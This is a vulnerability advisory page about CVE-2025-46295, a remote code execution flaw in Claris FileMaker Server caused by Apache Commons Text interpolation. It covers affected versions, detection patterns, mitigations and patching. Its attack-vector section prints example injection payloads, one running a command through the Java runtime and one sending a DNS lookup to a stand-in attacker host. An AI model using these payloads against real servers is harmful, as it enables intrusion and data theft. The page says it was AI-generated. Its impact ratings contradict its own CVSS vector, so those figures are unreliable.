The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2025-46295

CVE-2025-46295: Claris FileMaker Server RCE Vulnerability

CVE-2025-46295 is a remote code execution vulnerability in Claris FileMaker Server caused by Apache Commons Text interpolation flaws. Attackers can execute commands via untrusted input. Learn about affected versions and patches.

Published: March 11, 2026

CVE-2025-46295 Overview

CVE-2025-46295 is a critical code injection vulnerability affecting Claris FileMaker Server. The vulnerability originates from the inclusion of Apache Commons Text versions prior to 1.10.0, which contained interpolation features susceptible to abuse. When applications pass untrusted input into the text-substitution API, certain interpolators can trigger dangerous actions including command execution and access to external resources, potentially enabling remote code execution.

Critical Impact

Attackers can achieve remote code execution by exploiting insecure string interpolation in FileMaker Server, allowing complete system compromise without authentication.

Affected Products

  • Claris FileMaker Server versions prior to 22.0.4
  • Systems using Apache Commons Text versions prior to 1.10.0
  • Any FileMaker Server deployment accepting untrusted input through text-substitution APIs

Discovery Timeline

  • December 16, 2025 - CVE-2025-46295 published to NVD
  • December 23, 2025 - Last updated in NVD database

Technical Details for CVE-2025-46295

Vulnerability Analysis

This vulnerability is classified as Code Injection (CWE-94) and stems from insecure use of the Apache Commons Text string interpolation functionality. The Apache Commons Text library provides powerful text-substitution capabilities through various interpolators, including ones that can execute system commands, resolve DNS lookups, access environment variables, and interact with external resources.

When FileMaker Server processes user-controlled input through these interpolation functions without proper sanitization, an attacker can craft malicious input strings containing interpolator syntax. These specially crafted strings can trigger unintended actions on the server, including arbitrary command execution with the privileges of the FileMaker Server process.

The vulnerability requires no authentication and can be exploited remotely over the network, making it particularly dangerous for internet-facing FileMaker Server deployments.

Root Cause

The root cause lies in the unsafe default behavior of Apache Commons Text's StringSubstitutor class in versions prior to 1.10.0. Several default interpolators were enabled that could perform dangerous operations:

  • Script interpolator: Executes arbitrary scripts via the Java scripting API
  • DNS interpolator: Performs DNS lookups that can exfiltrate data
  • URL interpolator: Fetches content from arbitrary URLs (SSRF)

FileMaker Server's integration with this vulnerable library allowed untrusted user input to reach these interpolation functions, creating the exploitation path.

Attack Vector

The attack vector is network-based, requiring no user interaction or prior authentication. An attacker can send specially crafted requests to a vulnerable FileMaker Server instance containing malicious interpolation strings. When the server processes these strings through the Apache Commons Text API, the embedded interpolator commands execute.

A typical attack flow involves:

  1. Identifying a FileMaker Server endpoint that processes user input through text substitution
  2. Crafting a malicious payload using interpolation syntax (e.g., ${script:javascript:...})
  3. Sending the payload to the vulnerable endpoint
  4. Achieving code execution when the server processes the interpolation

The vulnerability mechanism involves exploiting the Apache Commons Text interpolation feature. When a vulnerable application passes untrusted input to StringSubstitutor, attackers can inject interpolator syntax such as ${script:javascript:java.lang.Runtime.getRuntime().exec('command')} or ${dns:attacker.com} to execute arbitrary commands or exfiltrate data. See the Claris Support Article for additional technical details.

Detection Methods for CVE-2025-46295

Indicators of Compromise

  • Unusual outbound DNS queries or network connections from FileMaker Server processes
  • Unexpected child processes spawned by the FileMaker Server application
  • Log entries containing interpolation syntax patterns such as ${script:, ${dns:, or ${url:
  • Evidence of command execution artifacts in server logs or file system changes

Detection Strategies

  • Monitor FileMaker Server request logs for patterns containing ${ followed by known interpolator prefixes like script:, dns:, url:, or file:
  • Deploy network intrusion detection rules to identify interpolation payload patterns in HTTP traffic destined for FileMaker Server
  • Implement application-layer firewall rules to block requests containing suspicious interpolation syntax
  • Use endpoint detection to monitor for unexpected process creation from FileMaker Server services

Monitoring Recommendations

  • Enable verbose logging on FileMaker Server to capture detailed request information for forensic analysis
  • Configure SIEM rules to alert on interpolation-related patterns in FileMaker Server logs
  • Monitor system process trees for anomalous child processes originating from FileMaker Server
  • Track outbound network connections from the server for signs of data exfiltration or reverse shell activity

How to Mitigate CVE-2025-46295

Immediate Actions Required

  • Upgrade Claris FileMaker Server to version 22.0.4 or later immediately
  • If immediate patching is not possible, restrict network access to FileMaker Server to trusted sources only
  • Review and audit any custom integrations that may pass user input to text processing functions
  • Implement input validation to reject requests containing interpolation syntax

Patch Information

Claris has released FileMaker Server version 22.0.4 which fully addresses this vulnerability by updating the bundled Apache Commons Text library to version 1.10.0 or later. This updated version disables dangerous interpolators by default, preventing exploitation.

Administrators should download the updated version from the official Claris support portal and follow standard upgrade procedures. The Claris Support Article provides detailed patch information and upgrade guidance.

Workarounds

  • Implement network-level access controls to limit FileMaker Server exposure to trusted networks only
  • Deploy a web application firewall (WAF) configured to block requests containing interpolation syntax patterns
  • If using custom code, explicitly disable dangerous interpolators by using StringSubstitutor with a restricted set of string lookups
  • Monitor and restrict outbound network traffic from FileMaker Server to prevent exploitation of DNS and URL interpolators
bash
# Configuration example - Restrict FileMaker Server network access
# Add firewall rules to limit access to trusted networks only
# Linux/iptables example:
iptables -A INPUT -p tcp --dport 5003 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 5003 -j DROP
iptables -A INPUT -p tcp --dport 16000 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 16000 -j DROP

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeRCE

  • Vendor/TechClaris Filemaker Server

  • SeverityCRITICAL

  • CVSS Score9.8

  • EPSS Probability0.38%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityHigh
  • CWE References
  • CWE-94
  • Vendor Resources
  • Claris Support Article
  • Related CVEs
  • CVE-2025-46320: Claris FileMaker Server XSS Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English